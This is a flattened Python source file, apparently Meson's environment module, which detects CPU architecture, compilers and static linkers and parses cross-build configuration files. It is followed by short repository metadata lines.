compilers.values(): try: if c.has_builtin_define('__i386__'): return 'x86' except mesonlib.MesonException: # Ignore compilers that do not support has_builtin_define. pass return 'x86_64' # Add fixes here as bugs are reported. 
if trial not in known_cpu_families: mlog.warning('Unknown CPU family {!r}, please report this at ' 'https://github.com/mesonbuild/meson/issues/new with the' 'output of `uname -a` and `cat /proc/cpuinfo`'.format(trial)) return trial def detect_cpu(compilers): if mesonlib.is_windows(): trial = detect_windows_arch(compilers) else: trial = platform.machine().lower() if trial in ('amd64', 'x64'): trial = 'x86_64' if trial == 'x86_64': # Same check as above for cpu_family for c in compilers.values(): try: if c.has_builtin_define('__i386__'): return 'i686' # All 64 bit cpus have at least this level of x86 support. except mesonlib.MesonException: pass return 'x86_64' if trial == 'e2k': # Make more precise CPU detection for Elbrus platform. trial = platform.processor().lower() # Add fixes here as bugs are reported. return trial def detect_system(): system = platform.system().lower() if system.startswith('cygwin'): return 'cygwin' return system def detect_msys2_arch(): if 'MSYSTEM_CARCH' in os.environ: return os.environ['MSYSTEM_CARCH'] return None def search_version(text): # Usually of the type 4.1.4 but compiler output may contain # stuff like this: # (Sourcery CodeBench Lite 2014.05-29) 4.8.3 20140320 (prerelease) # Limiting major version number to two digits seems to work # thus far. When we get to GCC 100, this will break, but # if we are still relevant when that happens, it can be # considered an achievement in itself. # # This regex is reaching magic levels. If it ever needs # to be updated, do not complexify but convert to something # saner instead. 
version_regex = '(?<!(\d|\.))(\d{1,2}(\.\d+)+(-[a-zA-Z0-9]+)?)' match = re.search(version_regex, text) if match: return match.group(0) return 'unknown version' class Environment: private_dir = 'meson-private' log_dir = 'meson-logs' def __init__(self, source_dir, build_dir, options): self.source_dir = source_dir self.build_dir = build_dir self.scratch_dir = os.path.join(build_dir, Environment.private_dir) self.log_dir = os.path.join(build_dir, Environment.log_dir) os.makedirs(self.scratch_dir, exist_ok=True) os.makedirs(self.log_dir, exist_ok=True) try: self.coredata = coredata.load(self.get_build_dir()) self.first_invocation = False except FileNotFoundError: self.create_new_coredata(options) except MesonException as e: # If we stored previous command line options, we can recover from # a broken/outdated coredata. if os.path.isfile(coredata.get_cmd_line_file(self.build_dir)): mlog.warning('Regenerating configuration from scratch.') mlog.log('Reason:', mlog.red(str(e))) coredata.read_cmd_line_file(self.build_dir, options) self.create_new_coredata(options) else: raise e self.exe_wrapper = None self.machines = MachineInfos() # Will be fully initialized later using compilers later. self.machines.detect_build() if self.coredata.cross_file: self.cross_info = CrossBuildInfo(self.coredata.cross_file) if 'exe_wrapper' in self.cross_info.config['binaries']: from .dependencies import ExternalProgram self.exe_wrapper = ExternalProgram.from_cross_info(self.cross_info, 'exe_wrapper') if 'host_machine' in self.cross_info.config: self.machines.host = MachineInfo.from_literal( self.cross_info.config['host_machine']) if 'target_machine' in self.cross_info.config: self.machines.target = MachineInfo.from_literal( self.cross_info.config['target_machine']) else: self.cross_info = None self.machines.default_missing() self.cmd_line_options = options.cmd_line_options.copy() # List of potential compilers. 
if mesonlib.is_windows(): self.default_c = ['cl', 'cc', 'gcc', 'clang', 'clang-cl'] self.default_cpp = ['cl', 'c++', 'g++', 'clang++', 'clang-cl'] else: self.default_c = ['cc', 'gcc', 'clang'] self.default_cpp = ['c++', 'g++', 'clang++'] if mesonlib.is_windows(): self.default_cs = ['csc', 'mcs'] else: self.default_cs = ['mcs', 'csc'] self.default_objc = ['cc'] self.default_objcpp = ['c++'] self.default_fortran = ['gfortran', 'g95', 'f95', 'f90', 'f77', 'ifort'] self.default_rust = ['rustc'] self.default_static_linker = ['ar'] self.vs_static_linker = ['lib'] self.clang_cl_static_linker = ['llvm-lib'] self.gcc_static_linker = ['gcc-ar'] self.clang_static_linker = ['llvm-ar'] # Various prefixes and suffixes for import libraries, shared libraries, # static libraries, and executables. # Versioning is added to these names in the backends as-needed. cross = self.is_cross_build() if mesonlib.for_windows(cross, self): self.exe_suffix = 'exe' self.object_suffix = 'obj' self.win_libdir_layout = True elif mesonlib.for_cygwin(cross, self): self.exe_suffix = 'exe' self.object_suffix = 'o' self.win_libdir_layout = True else: self.exe_suffix = '' self.object_suffix = 'o' self.win_libdir_layout = False if 'STRIP' in os.environ: self.native_strip_bin = shlex.split( os.environ[BinaryTable.evarMap['strip']]) else: self.native_strip_bin = ['strip'] def create_new_coredata(self, options): # WARNING: Don't use any values from coredata in __init__. It gets # re-initialized with project options by the interpreter during # build file parsing. 
self.coredata = coredata.CoreData(options) # Used by the regenchecker script, which runs meson self.coredata.meson_command = mesonlib.meson_command self.first_invocation = True def is_cross_build(self): return self.cross_info is not None def dump_coredata(self): return coredata.save(self.coredata, self.get_build_dir()) def get_script_dir(self): import mesonbuild.scripts return os.path.dirname(mesonbuild.scripts.__file__) def get_log_dir(self): return self.log_dir def get_coredata(self): return self.coredata def get_build_command(self, unbuffered=False): cmd = mesonlib.meson_command[:] if unbuffered and 'python' in os.path.basename(cmd[0]): cmd.insert(1, '-u') return cmd def is_header(self, fname): return is_header(fname) def is_source(self, fname): return is_source(fname) def is_assembly(self, fname): return is_assembly(fname) def is_llvm_ir(self, fname): return is_llvm_ir(fname) def is_object(self, fname): return is_object(fname) def is_library(self, fname): return is_library(fname) @staticmethod def get_gnu_compiler_defines(compiler): """ Detect GNU compiler platform type (Apple, MinGW, Unix) """ # Arguments to output compiler pre-processor defines to stdout # gcc, g++, and gfortran all support these arguments args = compiler + ['-E', '-dM', '-'] p, output, error = Popen_safe(args, write='', stdin=subprocess.PIPE) if p.returncode != 0: raise EnvironmentException('Unable to detect GNU compiler type:\n' + output + error) # Parse several lines of the type: # `#define ___SOME_DEF some_value` # and extract `___SOME_DEF` defines = {} for line in output.split('\n'): if not line: continue d, *rest = line.split(' ', 2) if d != '#define': continue if len(rest) == 1: defines[rest] = True if len(rest) == 2: defines[rest[0]] = rest[1] return defines @staticmethod def get_gnu_version_from_defines(defines): dot = '.' 
major = defines.get('__GNUC__', '0') minor = defines.get('__GNUC_MINOR__', '0') patch = defines.get('__GNUC_PATCHLEVEL__', '0') return dot.join((major, minor, patch)) @staticmethod def get_lcc_version_from_defines(defines): dot = '.' generation_and_major = defines.get('__LCC__', '100') generation = generation_and_major[:1] major = generation_and_major[1:] minor = defines.get('__LCC_MINOR__', '0') return dot.join((generation, major, minor)) @staticmethod def get_gnu_compiler_type(defines): # Detect GCC type (Apple, MinGW, Cygwin, Unix) if '__APPLE__' in defines: return CompilerType.GCC_OSX elif '__MINGW32__' in defines or '__MINGW64__' in defines: return CompilerType.GCC_MINGW elif '__CYGWIN__' in defines: return CompilerType.GCC_CYGWIN return CompilerType.GCC_STANDARD def _get_compilers(self, lang, want_cross): ''' The list of compilers is detected in the exact same way for C, C++, ObjC, ObjC++, Fortran, CS so consolidate it here. ''' evar = BinaryTable.evarMap[lang] if self.is_cross_build() and want_cross: if lang not in self.cross_info.config['binaries']: raise EnvironmentException('{!r} compiler binary not defined in cross file'.format(lang)) compilers, ccache = BinaryTable.parse_entry( mesonlib.stringlistify(self.cross_info.config['binaries'][lang])) BinaryTable.warn_about_lang_pointing_to_cross(compilers[0], evar) # Return value has to be a list of compiler 'choices' compilers = [compilers] is_cross = True exe_wrap = self.get_exe_wrapper() elif evar in os.environ: compilers, ccache = BinaryTable.parse_entry( shlex.split(os.environ[evar])) # Return value has to be a list of compiler 'choices' compilers = [compilers] is_cross = False exe_wrap = None else: compilers = getattr(self, 'default_' + lang) ccache = BinaryTable.detect_ccache() is_cross = False exe_wrap = None return compilers, ccache, is_cross, exe_wrap def _handle_exceptions(self, exceptions, binaries, bintype='compiler'): errmsg = 'Unknown {}(s): {}'.format(bintype, binaries) if exceptions: errmsg += 
'\nThe follow exceptions were encountered:' for (c, e) in exceptions.items(): errmsg += '\nRunning "{0}" gave "{1}"'.format(c, e) raise EnvironmentException(errmsg) def _detect_c_or_cpp_compiler(self, lang, want_cross): popen_exceptions = {} compilers, ccache, is_cross, exe_wrap = self._get_compilers(lang, want_cross) for compiler in compilers: if isinstance(compiler, str): compiler = [compiler] if not set(['cl', 'cl.exe', 'clang-cl', 'clang-cl.exe']).isdisjoint(compiler): # Watcom C provides it's own cl.exe clone that mimics an older # version of Microsoft's compiler. Since Watcom's cl.exe is # just a wrapper, we skip using it if we detect its presence # so as not to confuse Meson when configuring for MSVC. # # Additionally the help text of Watcom's cl.exe is paged, and # the binary will not exit without human intervention. In # practice, Meson will block waiting for Watcom's cl.exe to # exit, which requires user input and thus will never exit. if 'WATCOM' in os.environ: def sanitize(p): return os.path.normcase(os.path.abspath(p)) watcom_cls = [sanitize(os.path.join(os.environ['WATCOM'], 'BINNT', 'cl')), sanitize(os.path.join(os.environ['WATCOM'], 'BINNT', 'cl.exe'))] found_cl = sanitize(shutil.which('cl')) if found_cl in watcom_cls: continue arg = '/?' 
elif 'armcc' in compiler[0]: arg = '--vsn' elif 'ccrx' in compiler[0]: arg = '-v' else: arg = '--version' try: p, out, err = Popen_safe(compiler + [arg]) except OSError as e: popen_exceptions[' '.join(compiler + [arg])] = e continue if 'ccrx' in compiler[0]: out = err full_version = out.split('\n', 1)[0] version = search_version(out) guess_gcc_or_lcc = False if 'Free Software Foundation' in out: guess_gcc_or_lcc = 'gcc' if 'e2k' in out and 'lcc' in out: guess_gcc_or_lcc = 'lcc' if guess_gcc_or_lcc: defines = self.get_gnu_compiler_defines(compiler) if not defines: popen_exceptions[' '.join(compiler)] = 'no pre-processor defines' continue compiler_type = self.get_gnu_compiler_type(defines) if guess_gcc_or_lcc == 'lcc': version = self.get_lcc_version_from_defines(defines) cls = ElbrusCCompiler if lang == 'c' else ElbrusCPPCompiler else: version = self.get_gnu_version_from_defines(defines) cls = GnuCCompiler if lang == 'c' else GnuCPPCompiler return cls(ccache + compiler, version, compiler_type, is_cross, exe_wrap, defines, full_version=full_version) if 'armclang' in out: # The compiler version is not present in the first line of output, # instead it is present in second line, startswith 'Component:'. 
# So, searching for the 'Component' in out although we know it is # present in second line, as we are not sure about the # output format in future versions arm_ver_str = re.search('.*Component.*', out) if arm_ver_str is None: popen_exceptions[' '.join(compiler)] = 'version string not found' continue arm_ver_str = arm_ver_str.group(0) # Override previous values version = search_version(arm_ver_str) full_version = arm_ver_str compiler_type = CompilerType.ARM_WIN cls = ArmclangCCompiler if lang == 'c' else ArmclangCPPCompiler return cls(ccache + compiler, version, compiler_type, is_cross, exe_wrap, full_version=full_version) if 'CL.EXE COMPATIBILITY' in out: # if this is clang-cl masquerading as cl, detect it as cl, not # clang arg = '--version' try: p, out, err = Popen_safe(compiler + [arg]) except OSError as e: popen_exceptions[' '.join(compiler + [arg])] = e version = search_version(out) is_64 = 'Target: x86_64' in out cls = ClangClCCompiler if lang == 'c' else ClangClCPPCompiler return cls(compiler, version, is_cross, exe_wrap, is_64) if 'clang' in out: if 'Apple' in out or mesonlib.for_darwin(want_cross, self): compiler_type = CompilerType.CLANG_OSX elif 'windows' in out or mesonlib.for_windows(want_cross, self): compiler_type = CompilerType.CLANG_MINGW else: compiler_type = CompilerType.CLANG_STANDARD cls = ClangCCompiler if lang == 'c' else ClangCPPCompiler return cls(ccache + compiler, version, compiler_type, is_cross, exe_wrap, full_version=full_version) if 'Microsoft' in out or 'Microsoft' in err: # Latest versions of Visual Studio print version # number to stderr but earlier ones print version # on stdout. Why? Lord only knows. # Check both outputs to figure out version. 
version = search_version(err) if version == 'unknown version': version = search_version(out) if version == 'unknown version': m = 'Failed to detect MSVC compiler arch: stderr was\n{!r}' raise EnvironmentException(m.format(err)) is_64 = err.split('\n')[0].endswith(' x64') cls = VisualStudioCCompiler if lang == 'c' else VisualStudioCPPCompiler return cls(compiler, version, is_cross, exe_wrap, is_64) if '(ICC)' in out: if mesonlib.for_darwin(want_cross, self): compiler_type = CompilerType.ICC_OSX elif mesonlib.for_windows(want_cross, self): # TODO: fix ICC on Windows compiler_type = CompilerType.ICC_WIN else: compiler_type = CompilerType.ICC_STANDARD cls = IntelCCompiler if lang == 'c' else IntelCPPCompiler return cls(ccache + compiler, version, compiler_type, is_cross, exe_wrap, full_version=full_version) if 'ARM' in out: compiler_type = CompilerType.ARM_WIN cls = ArmCCompiler if lang == 'c' else ArmCPPCompiler return cls(ccache + compiler, version, compiler_type, is_cross, exe_wrap, full_version=full_version) if 'RX Family' in out: compiler_type = CompilerType.CCRX_WIN cls = CcrxCCompiler if lang == 'c' else CcrxCPPCompiler return cls(ccache + compiler, version, compiler_type, is_cross, exe_wrap, full_version=full_version) self._handle_exceptions(popen_exceptions, compilers) def detect_c_compiler(self, want_cross): return self._detect_c_or_cpp_compiler('c', want_cross) def detect_cpp_compiler(self, want_cross): return self._detect_c_or_cpp_compiler('cpp', want_cross) def detect_fortran_compiler(self, want_cross): popen_exceptions = {} compilers, ccache, is_cross, exe_wrap = self._get_compilers('fortran', want_cross) for compiler in compilers: if isinstance(compiler, str): compiler = [compiler] for arg in ['--version', '-V']: try: p, out, err = Popen_safe(compiler + [arg]) except OSError as e: popen_exceptions[' '.join(compiler + [arg])] = e continue version = search_version(out) full_version = out.split('\n', 1)[0] guess_gcc_or_lcc = False if 'GNU Fortran' in out: 
guess_gcc_or_lcc = 'gcc' if 'e2k' in out and 'lcc' in out: guess_gcc_or_lcc = 'lcc' if guess_gcc_or_lcc: defines = self.get_gnu_compiler_defines(compiler) if not defines: popen_exceptions[' '.join(compiler)] = 'no pre-processor defines' continue compiler_type = self.get_gnu_compiler_type(defines) if guess_gcc_or_lcc == 'lcc': version = self.get_lcc_version_from_defines(defines) cls = ElbrusFortranCompiler else: version = self.get_gnu_version_from_defines(defines) cls = GnuFortranCompiler return cls(compiler, version, compiler_type, is_cross, exe_wrap, defines, full_version=full_version) if 'G95' in out: return G95FortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) if 'Sun Fortran' in err: version = search_version(err) return SunFortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) if 'ifort (IFORT)' in out: return IntelFortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) if 'PathScale EKOPath(tm)' in err: return PathScaleFortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) if 'PGI Compilers' in out: return PGIFortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) if 'Open64 Compiler Suite' in err: return Open64FortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) if 'NAG Fortran' in err: return NAGFortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) self._handle_exceptions(popen_exceptions, compilers) def get_scratch_dir(self): return self.scratch_dir def detect_objc_compiler(self, want_cross): popen_exceptions = {} compilers, ccache, is_cross, exe_wrap = self._get_compilers('objc', want_cross) for compiler in compilers: if isinstance(compiler, str): compiler = [compiler] arg = ['--version'] try: p, out, err = Popen_safe(compiler + arg) except OSError as e: popen_exceptions[' '.join(compiler + arg)] = e continue version = search_version(out) if 'Free Software 
Foundation' in out or ('e2k' in out and 'lcc' in out): defines = self.get_gnu_compiler_defines(compiler) if not defines: popen_exceptions[' '.join(compiler)] = 'no pre-processor defines' continue compiler_type = self.get_gnu_compiler_type(defines) version = self.get_gnu_version_from_defines(defines) return GnuObjCCompiler(ccache + compiler, version, compiler_type, is_cross, exe_wrap, defines) if out.startswith('Apple LLVM'): return ClangObjCCompiler(ccache + compiler, version, CompilerType.CLANG_OSX, is_cross, exe_wrap) if out.startswith('clang'): return ClangObjCCompiler(ccache + compiler, version, CompilerType.CLANG_STANDARD, is_cross, exe_wrap) self._handle_exceptions(popen_exceptions, compilers) def detect_objcpp_compiler(self, want_cross): popen_exceptions = {} compilers, ccache, is_cross, exe_wrap = self._get_compilers('objcpp', want_cross) for compiler in compilers: if isinstance(compiler, str): compiler = [compiler] arg = ['--version'] try: p, out, err = Popen_safe(compiler + arg) except OSError as e: popen_exceptions[' '.join(compiler + arg)] = e continue version = search_version(out) if 'Free Software Foundation' in out or ('e2k' in out and 'lcc' in out): defines = self.get_gnu_compiler_defines(compiler) if not defines: popen_exceptions[' '.join(compiler)] = 'no pre-processor defines' continue compiler_type = self.get_gnu_compiler_type(defines) version = self.get_gnu_version_from_defines(defines) return GnuObjCPPCompiler(ccache + compiler, version, compiler_type, is_cross, exe_wrap, defines) if out.startswith('Apple LLVM'): return ClangObjCPPCompiler(ccache + compiler, version, CompilerType.CLANG_OSX, is_cross, exe_wrap) if out.startswith('clang'): return ClangObjCPPCompiler(ccache + compiler, version, CompilerType.CLANG_STANDARD, is_cross, exe_wrap) self._handle_exceptions(popen_exceptions, compilers) def detect_java_compiler(self): exelist = ['javac'] try: p, out, err = Popen_safe(exelist + ['-version']) except OSError: raise EnvironmentException('Could 
not execute Java compiler "%s"' % ' '.join(exelist)) if 'javac' in out or 'javac' in err: version = search_version(err if 'javac' in err else out) return JavaCompiler(exelist, version) raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"') def detect_cs_compiler(self): compilers, ccache, is_cross, exe_wrap = self._get_compilers('cs', False) popen_exceptions = {} for comp in compilers: if not isinstance(comp, list): comp = [comp] try: p, out, err = Popen_safe(comp + ['--version']) except OSError as e: popen_exceptions[' '.join(comp + ['--version'])] = e continue version = search_version(out) if 'Mono' in out: return MonoCompiler(comp, version) elif "Visual C#" in out: return VisualStudioCsCompiler(comp, version) self._handle_exceptions(popen_exceptions, compilers) def detect_vala_compiler(self): if 'VALAC' in os.environ: exelist = shlex.split(os.environ['VALAC']) else: exelist = ['valac'] try: p, out = Popen_safe(exelist + ['--version'])[0:2] except OSError: raise EnvironmentException('Could not execute Vala compiler "%s"' % ' '.join(exelist)) version = search_version(out) if 'Vala' in out: return ValaCompiler(exelist, version) raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"') def detect_rust_compiler(self, want_cross): popen_exceptions = {} compilers, ccache, is_cross, exe_wrap = self._get_compilers('rust', want_cross) for compiler in compilers: if isinstance(compiler, str): compiler = [compiler] arg = ['--version'] try: p, out = Popen_safe(compiler + arg)[0:2] except OSError as e: popen_exceptions[' '.join(compiler + arg)] = e continue version = search_version(out) if 'rustc' in out: return RustCompiler(compiler, version, is_cross, exe_wrap) self._handle_exceptions(popen_exceptions, compilers) def detect_d_compiler(self, want_cross): is_cross = False # Search for a D compiler. 
# We prefer LDC over GDC unless overridden with the DC # environment variable because LDC has a much more # up to date language version at time (2016). if 'DC' in os.environ: exelist = shlex.split(os.environ['DC']) if os.path.basename(exelist[-1]).startswith(('ldmd', 'gdmd')): raise EnvironmentException('Meson doesn\'t support %s as it\'s only a DMD frontend for another compiler. Please provide a valid value for DC or unset it so that Meson can resolve the compiler by itself.' % exelist[-1]) elif self.is_cross_build() and want_cross: exelist = mesonlib.stringlistify(self.cross_info.config['binaries']['d']) is_cross = True elif shutil.which("ldc2"): exelist = ['ldc2'] elif shutil.which("ldc"): exelist = ['ldc'] elif shutil.which("gdc"): exelist = ['gdc'] elif shutil.which("dmd"): exelist = ['dmd'] else: raise EnvironmentException('Could not find any supported D compiler.') try: p, out = Popen_safe(exelist + ['--version'])[0:2] except OSError: raise EnvironmentException('Could not execute D compiler "%s"' % ' '.join(exelist)) version = search_version(out) full_version = out.split('\n', 1)[0] # Detect the target architecture, required for proper architecture handling on Windows. c_compiler = {} is_msvc = mesonlib.is_windows() and 'VCINSTALLDIR' in os.environ if is_msvc: c_compiler = {'c': self.detect_c_compiler(want_cross)} # MSVC compiler is required for correct platform detection. 
arch = detect_cpu_family(c_compiler) if is_msvc and arch == 'x86': arch = 'x86_mscoff' if 'LLVM D compiler' in out: return compilers.LLVMDCompiler(exelist, version, is_cross, arch, full_version=full_version) elif 'gdc' in out: return compilers.GnuDCompiler(exelist, version, is_cross, arch, full_version=full_version) elif 'The D Language Foundation' in out or 'Digital Mars' in out: return compilers.DmdDCompiler(exelist, version, is_cross, arch, full_version=full_version) raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"') def detect_swift_compiler(self): exelist = ['swiftc'] try: p, _, err = Popen_safe(exelist + ['-v']) except OSError: raise EnvironmentException('Could not execute Swift compiler "%s"' % ' '.join(exelist)) version = search_version(err) if 'Swift' in err: return compilers.SwiftCompiler(exelist, version) raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"') def detect_static_linker(self, compiler): if compiler.is_cross: linker = self.cross_info.config['binaries']['ar'] if isinstance(linker, str): linker = [linker] linkers = [linker] else: evar = BinaryTable.evarMap['ar'] if evar in os.environ: linkers = [shlex.split(os.environ[evar])] elif isinstance(compiler, compilers.VisualStudioCCompiler): linkers = [self.vs_static_linker, self.clang_cl_static_linker] elif isinstance(compiler, compilers.GnuCompiler): # Use gcc-ar if available; needed for LTO linkers = [self.gcc_static_linker, self.default_static_linker] elif isinstance(compiler, compilers.ClangCompiler): # Use llvm-ar if available; needed for LTO linkers = [self.clang_static_linker, self.default_static_linker] elif isinstance(compiler, compilers.DCompiler): # Prefer static linkers over linkers used by D compilers if mesonlib.is_windows(): linkers = [self.vs_static_linker, self.clang_cl_static_linker, compiler.get_linker_exelist()] else: linkers = [self.default_static_linker, compiler.get_linker_exelist()] else: linkers = [self.default_static_linker] 
popen_exceptions = {} for linker in linkers: if not set(['lib', 'lib.exe', 'llvm-lib', 'llvm-lib.exe']).isdisjoint(linker): arg = '/?' else: arg = '--version' try: p, out, err = Popen_safe(linker + [arg]) except OSError as e: popen_exceptions[' '.join(linker + [arg])] = e continue if '/OUT:' in out.upper() or '/OUT:' in err.upper(): return VisualStudioLinker(linker) if p.returncode == 0 and ('armar' in linker or 'armar.exe' in linker): return ArmarLinker(linker) if 'DMD32 D Compiler' in out or 'DMD64 D Compiler' in out: return DLinker(linker, compiler.arch) if 'LDC - the LLVM D compiler' in out: return DLinker(linker, compiler.arch) if 'GDC' in out and ' based on D ' in out: return DLinker(linker, compiler.arch) if err.startswith('Renesas') and ('rlink' in linker or 'rlink.exe' in linker): return CcrxLinker(linker) if p.returncode == 0: return ArLinker(linker) if p.returncode == 1 and err.startswith('usage'): # OSX return ArLinker(linker) if p.returncode == 1 and err.startswith('Usage'): # AIX return ArLinker(linker) self._handle_exceptions(popen_exceptions, linkers, 'linker') raise EnvironmentException('Unknown static linker "%s"' % ' '.join(linkers)) def get_source_dir(self): return self.source_dir def get_build_dir(self): return self.build_dir def get_exe_suffix(self): return self.exe_suffix def get_import_lib_dir(self): "Install dir for the import library (library used for linking)" return self.get_libdir() def get_shared_module_dir(self): "Install dir for shared modules that are loaded at runtime" return self.get_libdir() def get_shared_lib_dir(self): "Install dir for the shared library" if self.win_libdir_layout: return self.get_bindir() return self.get_libdir() def get_static_lib_dir(self): "Install dir for the static library" return self.get_libdir() def get_object_suffix(self): return self.object_suffix def get_prefix(self): return self.coredata.get_builtin_option('prefix') def get_libdir(self): return self.coredata.get_builtin_option('libdir') def 
get_libexecdir(self): return self.coredata.get_builtin_option('libexecdir') def get_bindir(self): return self.coredata.get_builtin_option('bindir') def get_includedir(self): return self.coredata.get_builtin_option('includedir') def get_mandir(self): return self.coredata.get_builtin_option('mandir') def get_datadir(self): return self.coredata.get_builtin_option('datadir') def get_compiler_system_dirs(self): for comp in self.coredata.compilers.values(): if isinstance(comp, compilers.ClangCompiler): index = 1 break elif isinstance(comp, compilers.GnuCompiler): index = 2 break else: # This option is only supported by gcc and clang. If we don't get a # GCC or Clang compiler return and empty list. return [] p, out, _ = Popen_safe(comp.get_exelist() + ['-print-search-dirs']) if p.returncode != 0: raise mesonlib.MesonException('Could not calculate system search dirs') out = out.split('\n')[index].lstrip('libraries: =').split(':') return [os.path.normpath(p) for p in out] def get_exe_wrapper(self): if not self.cross_info.need_exe_wrapper(): from .dependencies import EmptyExternalProgram return EmptyExternalProgram() return self.exe_wrapper class CrossBuildInfo: def __init__(self, filename): self.config = {'properties': {}} self.parse_datafile(filename) if 'host_machine' not in self.config and 'target_machine' not in self.config: raise mesonlib.MesonException('Cross info file must have either host or a target machine.') if 'host_machine' in self.config and 'binaries' not in self.config: raise mesonlib.MesonException('Cross file with "host_machine" is missing "binaries".') def ok_type(self, i): return isinstance(i, (str, int, bool)) def parse_datafile(self, filename): config = configparser.ConfigParser() try: with open(filename, 'r') as f: config.read_file(f, filename) except FileNotFoundError: raise EnvironmentException('File not found: %s.' % filename) # This is a bit hackish at the moment. 
for s in config.sections(): self.config[s] = {} for entry in config[s]: value = config[s][entry] if ' ' in entry or '\t' in entry or "'" in entry or '"' in entry: raise EnvironmentException('Malformed variable name %s in cross file..' % entry) try: res = eval(value, {'__builtins__': None}, {'true': True, 'false': False}) except Exception: raise EnvironmentException('Malformed value in cross file variable %s.' % entry) if self.ok_type(res): self.config[s][entry] = res elif isinstance(res, list): for i in res: if not self.ok_type(i): raise EnvironmentException('Malformed value in cross file variable %s.' % entry) self.config[s][entry] = res else: raise EnvironmentException('Malformed value in cross file variable %s.' % entry) def has_host(self): return 'host_machine' in self.config def has_target(self): return 'target_machine' in self.config def has_stdlib(self, language): return language + '_stdlib' in self.config['properties'] def get_stdlib(self, language): return self.config['properties'][language + '_stdlib'] def get_host_system(self): "Name of host system like 'linux', or None" if self.has_host(): return self.config['host_machine']['system'] return None def get_properties(self): return self.config['properties'] def get_root(self): return self.get_properties().get('root', None) def get_sys_root(self): return self.get_properties().get('sys_root', None) # When compiling a cross compiler we use the native compiler for everything. # But not when cross compiling a cross compiler. def need_cross_compiler(self): return 'host_machine' in self.config def need_exe_wrapper(self): value = self.config['properties'].get('needs_exe_wrapper', None) if value is not None: return value # Can almost always run 32-bit binaries on 64-bit natively if the host # and build systems are the same. We don't pass any compilers to # detect_cpu_family() here because we always want to know the OS # architecture, not what the compiler environment tells us. 
if self.has_host() and detect_cpu_family({}) == 'x86_64' and \ self.config['host_machine']['cpu_family'] == 'x86' and \ self.config['host_machine']['system'] == detect_system(): return False return True class MachineInfo: def __init__(self, system, cpu_family, cpu, endian): self.system = system self.cpu_family = cpu_family self.cpu = cpu self.endian = endian def __eq__(self, other): if self.__class__ is not other.__class__: return NotImplemented return \ self.system == other.system and \ self.cpu_family == other.cpu_family and \ self.cpu == other.cpu and \ self.endian == other.endian def __ne__(self, other): if self.__class__ is not other.__class__: return NotImplemented return not self.__eq__(other) @staticmethod def detect(compilers = None): """Detect the machine we're running on If compilers are not provided, we cannot know as much. None out those fields to avoid accidentally depending on partial knowledge. The underlying ''detect_*'' method can be called to explicitly use the partial information. """ return MachineInfo( detect_system(), detect_cpu_family(compilers) if compilers is not None else None, detect_cpu(compilers) if compilers is not None else None, sys.byteorder) @staticmethod def from_literal(literal): minimum_literal = {'cpu', 'cpu_family', 'endian', 'system'} if set(literal) < minimum_literal: raise EnvironmentException( 'Machine info is currently {}\n'.format(literal) + 'but is missing {}.'.format(minimum_literal - set(literal))) cpu_family = literal['cpu_family'] if cpu_family not in known_cpu_families: mlog.warning('Unknown CPU family %s, please report this at https://github.com/mesonbuild/meson/issues/new' % cpu_family) endian = literal['endian'] if endian not in ('little', 'big'): mlog.warning('Unknown endian %s' % endian) return MachineInfo( literal['system'], cpu_family, literal['cpu'], endian) def is_windows(self): """ Machine is windows? """ return self.system == 'windows' def is_cygwin(self): """ Machine is cygwin? 
""" return self.system == 'cygwin' def is_linux(self): """ Machine is linux? """ return self.system == 'linux' def is_darwin(self): """ Machine is Darwin (iOS/OS X)? """ return self.system in ('darwin', 'ios') def is_android(self): """ Machine is Android? """ return self.system == 'android' def is_haiku(self): """ Machine is Haiku? """ return self.system == 'haiku' def is_openbsd(self): """ Machine is OpenBSD? """ return self.system == 'openbsd' # Various prefixes and suffixes for import libraries, shared libraries, # static libraries, and executables. # Versioning is added to these names in the backends as-needed. def get_exe_suffix(self): if self.is_windows() or self.is_cygwin(): return 'exe' else: return '' def get_object_suffix(self): if self.is_windows(): return 'obj' else: return 'o' def libdir_layout_is_win(self): return self.is_windows() \ or self.is_cygwin() class MachineInfos(PerMachine): def __init__(self): super().__init__(None, None, None) def default_missing(self): """Default host to buid and target to host. This allows just specifying nothing in the native case, just host in the cross non-compiler case, and just target in the native-built cross-compiler case. """ if self.host is None: self.host = self.build if self.target is None: self.target = self.host def miss_defaulting(self): """Unset definition duplicated from their previous to None This is the inverse of ''default_missing''. By removing defaulted machines, we can elaborate the original and then redefault them and thus avoid repeating the elaboration explicitly. """ if self.target == self.host: self.target = None if self.host == self.build: self.host = None def detect_build(self, compilers = None): self.build = MachineInfo.detect(compilers) class BinaryTable: # Map from language identifiers to environment variables. 
evarMap = { # Compilers 'c': 'CC', 'cpp': 'CXX', 'cs': 'CSC', 'd': 'DC', 'fortran': 'FC', 'objc': 'OBJC', 'objcpp': 'OBJCXX', 'rust': 'RUSTC', 'vala': 'VALAC', # Binutils 'strip': 'STRIP', 'ar': 'AR', } @classmethod def detect_ccache(cls): try: has_ccache = subprocess.call(['ccache', '--version'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) except OSError: has_ccache = 1 if has_ccache == 0: cmdlist = ['ccache'] else: cmdlist = [] return cmdlist @classmethod def warn_about_lang_pointing_to_cross(cls, compiler_exe, evar): evar_str = os.environ.get(evar, 'WHO_WOULD_CALL_THEIR_COMPILER_WITH_THIS_NAME') if evar_str == compiler_exe: mlog.warning('''Env var %s seems to point to the cross compiler. This is probably wrong, it should always point to the native compiler.''' % evar) @classmethod def parse_entry(cls, entry): compiler = mesonlib.stringlistify(entry) # Ensure ccache exists and remove it if it doesn't if compiler[0] == 'ccache': compiler = compiler[1:] ccache = cls.detect_ccache() else: ccache = [] # Return value has to be a list of compiler 'choices' return compiler, ccache
apache-2.0
pratikmallya/hue
desktop/core/ext-py/Django-1.6.10/tests/initial_sql_regress/tests.py
58
1614
